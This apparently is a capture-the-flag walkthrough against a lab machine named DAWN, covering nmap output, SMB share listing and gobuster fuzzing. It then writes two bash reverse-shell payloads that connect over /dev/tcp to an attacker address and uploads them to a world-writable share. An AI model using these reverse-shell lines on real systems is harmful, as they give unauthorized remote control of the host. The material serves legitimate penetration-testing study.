PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 17
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, LongColumnFlag, SupportsCompression, Speaks41ProtocolOld, ODBCClient, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: $+L|LEVabI(+@=QbwPjE
|_ Auth Plugin Name: mysql_native_password
Service Info: Host: DAWN
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-05T15:52:02
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: dawn
| NetBIOS computer name: DAWN\\x00
| Domain name: dawn
| FQDN: dawn.dawn
|_ System time: 2022-07-05T11:52:03-04:00
|_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s
There is SMB enabled so let’s check the share name
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient -L \\\\\\\\192.168.81.11\\\\
Password for [WORKGROUP\\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP WIN2K3STDVIC
After looking around but there is nothing interesting, move on to fuzzing
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.11 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/.htaccess (Status: 403) [Size: 297]
/index.html (Status: 200) [Size: 791]
/logs (Status: 301) [Size: 313] [--> <http://192.168.81.11/logs/>]
/server-status (Status: 403) [Size: 301]
The /logs seems sus here
From the management.log we only know there is user dawn and user ganimedes
Also there is directory that permission chmod to 777
As we can see in the SMB shares there is one ITDEPT, while from the management.log we know that the ITDEPT have write permission for everyone.
We can put a reverse shell called web-control and product-control inside ITDEPT/ folder and find a way to trigger it.
We can also run enum4linux to understand the host
enum4linux -a 192.168.81.11
Craft out payload
┌──(kali㉿VirtualBox)-[~]
└─$ cat web-control
bash -c 'exec bash -i &>/dev/tcp/192.168.49.81/1234 <&1'
┌──(kali㉿VirtualBox)-[~]
└─$ cat product-control
bash -c 'exec bash -i &>/dev/tcp/192.168.49.81/4444 <&1'
SMB into ITDEPT and upload those 2 payloads
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient \\\\\\\\192.168.81.11\\\\ITDEPT
smb: \\> put product-control
smb: \\> put web-control
smb: \\> ls
. D 0 Fri Jul 8 05:58:39 2022
.. D 0 Wed Jul 22 13:19:41 2020
web-control A 57 Fri Jul 8 05:58:40 2022
product-control A 57 Fri Jul 8 05:58:33 2022